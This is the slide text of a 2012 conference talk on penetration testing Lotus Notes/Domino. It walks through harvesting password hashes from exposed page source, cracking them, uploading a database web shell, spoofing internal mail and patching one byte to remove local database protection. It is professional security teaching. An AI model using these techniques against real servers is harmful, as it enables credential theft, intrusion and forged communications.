toppling domino - 44con 4012

© 2012 SecQuest Information Security Ltd.

44Con 2012: Toppling Domino

Testing security in a Lotus Notes environment

SecQuestINFORMATION SECURITY

Written & Presented by Darren Fuller

SecQuest Information Security Ltd.


44Con: London, September 2012

About this Presentation

This presentation was originally given at 44Con 2012 in London and had a number of interactive demos which obviously cannot be included.

If you or your company would like further information about Domino security or to arrange a re-run of this talk on your premises please contact us.

https://www.secquest.co.uk

Tel: 0845 19 31337



Who Am I?

Darren Fuller

Lotus PCLP*

Security Consultant

Ex IBM Notes developer

Ex IBM EMEA X-Force

Run a company called SecQuest

Been using Notes since V3 on IBM OS/2

* Domino R5



What I’m Talking About Today

“Although there have been a number of technical papers published by different researchers covering Lotus Notes/Domino security it is rarely covered by the wider pen testing community.

In this presentation I’ll aim to give a general overview of Domino security and demonstrate ways of breaking in. This will cover security issues from the point of view of the web server, native Domino server and demonstrate some tricks you can use from the client side of things.”



Typical!

Nothing about Notes/Domino for a while then William Dawson talked about it at BSides Vegas this year!

Interesting talk about Domino hashes which we’ll cover in a bit of detail later

Link to talks:

http://www.irongeek.com/i.php?page=videos/bsideslasvegas2012/mainlist



Used By…

More than half of Fortune 100 companies & more



Created by Ray Ozzie/Iris Associates

V1 Shipped in 1989

Included public key cryptography

3 major editions available in the early days

V8.5.4 is currently in beta

Lotus Notes/Domino: History



US Edition used 64 bit keys

International keys restricted to 40 bits due to US export rules before 1997

Deal with US .gov to allow 64 bit international keys after 1997 providing they had the first 24 bits

France didn’t like this! A French edition was made with 40 bit encryption keys

These days 128 and 256 bit AES can be used

Crypto Background Information



Security Overview

ID Files

Database ACL (Access control list)

Execution Control List (ECL)

NAB Groups



Security Overview – Encryption Layers

Database Encryption

Document Encryption

Field Encryption

Transport Layer Encryption



C’mon! We’re h4X0rs..

Can we whack it?



Yes we Can!

Examples given in this presentation are based on “real world” tests.

These techniques have been used a number of times to compromise various client sites.

Obviously root is nice but the data is the thing to go for, the right Notes user will give you the keys to the kingdom!



Breaking In Externally – What to look for

names.nsf database with anonymous access

domlog.nsf with anonymous access

webadmin.nsf (you’ll be lucky!)



Anonymous access to domlog.nsf can give you a session ID, these default to 30 minute expiry

Checking out the /hacker Domain



NAB Access!



Because..

The admins have messed up and granted anonymous “reader” access



HTTPPassword in Document Source

Vulnerability documented in 2005

Still overlooked by a lot of admins



HTTPPassword in Document Source

<input name="FullName" type="hidden" value="MilexaCrozzd/hacker; Milexa Crozzd">

<input name="ShortName" type="hidden" value="milexa">

<input name="HTTPPassword" type="hidden" value="(GbZjMLBTiHzBXtS0TcIl)">

<input name="dspHTTPPassword" type="hidden" value="(GbZjMLBTiHzBXtS0TcIl)">

Metasploit can automate hash gathering



Grab password hashes from the document source

Domino has two types of password hashes for internet passwords; “normal” and “more secure”

Use JTR with Jumbo Patch

“normal” = “lotus5”

“more secure” = “dominosec”

Cracking Passwords



Cracking Passwords: results



Once you have cracked some passwords you should be able to authenticate and access catalog.nsf

If “internet authentication” is set to “Fewer name variations with higher security” you need to use the full canonical username: Joe King/hacker

catalog.nsf contains a list of all databases on the server + access control information

The “By Name” view will give you a list of databases your user can access

Targeting “Interesting” Users



Targeting “Interesting” Users



Access Control List Info



Check group members in names.nsf

JTR popped this one earlier!



webadmin.nsf allows an administrator to run server commands.

Getting More Access – Running Commands



You can run O/S commands using “load” but can’t see the results when using quick console.

For some reason writing output to a web accessible directory didn’t work on Linux

Solution: upload a Notes database shell!

Getting More Access



Introducing shell.nsf aka D99Shell

You may get a certificate error after uploading..



D99Shell in action!



Also works on Windows servers



Demo: Breaking In!

Oh Noez! U R demoin dis live!?!



Find ID files on the network

Crack passwords

Get in to the NAB on the server

Find ID files with higher levels of access

Pw0nage!

Breaking in from the Inside - Objectives



“Many breaches of security are done by insiders“- Katherine Spanbauer, Domino senior product manager

Are Employees the Biggest Threat?



Since R5 you need an ID file to access the client

ID file needs to be valid and not in a “deny access”group in the NAB.

Shared directories FTW!

Gaining A Toehold



It used to be hard to crack native Notes passwords!

There are a number of products available to crack ID file passwords

Huge thanks to Nataly at Passware* for the software being used in the following demo..

* http://www.lostpassword.com

Gaining A Toehold



Demo: Notes ID Password Cracking

I can haz beerz after, right?



We’re going after the payroll

Our freshly cracked ID file gives catalog.nsf & names.nsf access



Check the NAB (names.nsf) for group members

Oops!



The result..



Client-side Tricks

Spoofing mail..

Removing restrictions of local access

LotusScript can access the Windows API!

Declare Function GetClipboardData Lib "User32" (Byval wFormatAs Long) As Long



SMTP mail can be easily spoofed using telnet but document properties are a dead giveaway

Mail spoofing; getting a payrise!



This is all that is required:

The Spoof Memo Form



The result

Create a new mail using the evil form and copy/paste it in to the mail.box database on the spoofed user’s server

Looks Good..

The only giveaway..



Local Access Protection

Lotus Notes has an ACL setting to “Enforce consistent ACL”

Opening a “protected” database locally gives an error like this:

Not this ->



I Can’t Access It Locally Eh!

There are companies out there selling various unlock solutions

Prices for software range from $49 to $657!!

I’ve tested a few versions of these “life saving”products..

One of them changed 4 bytes, another changed 6!



I Can’t Access It Locally Eh!

I mentioned to colleagues @ IBM in 2004 that you could change 1 byte to remove protection

These apps are doing 75% too much work!

Sorry guys, the secret’s out:

Changing 0x000002C4 from 20 to 00 could save $700!



Tool release

Local Access Protection Deprotector And No Cash Expected



Tool release: lapdance

Local Access Protection Deprotector And No Cash Expected (lapdance.pl)

Written in Perl (badly), gives some info about the database and can add and remove protection

Available from https://www.secquest.co.uk/tools/lapdance.pl



Tool release: lapdance

Local Access Protection Deprotector And No Cash Expected (lapdance.pl)

Support for ODS versions 16, 17, 20, 41, 43, 48 and 51 (ie. everything from V2 to V8.5)

Will display database protection and encryption flags information

Can add and remove local access protection



Ohalp! Prayrz 2 Ceilin Cat dat dis workz!

Demo: Removing Database Protection!



To Finish..

“In this presentation I’ll aim to give a general overview of Domino security and demonstrate ways of breaking in. This will cover security issues from the point of view of the web server, native Domino server and demonstrate some tricks you can use from the client side of things.”



@UKFully

@SecQuest

toppling domino - 44con 4012

Technology

secquest information

security issues

higher security

encryption keys

domino hashes

document source domino

anonymous reader access

keys international keys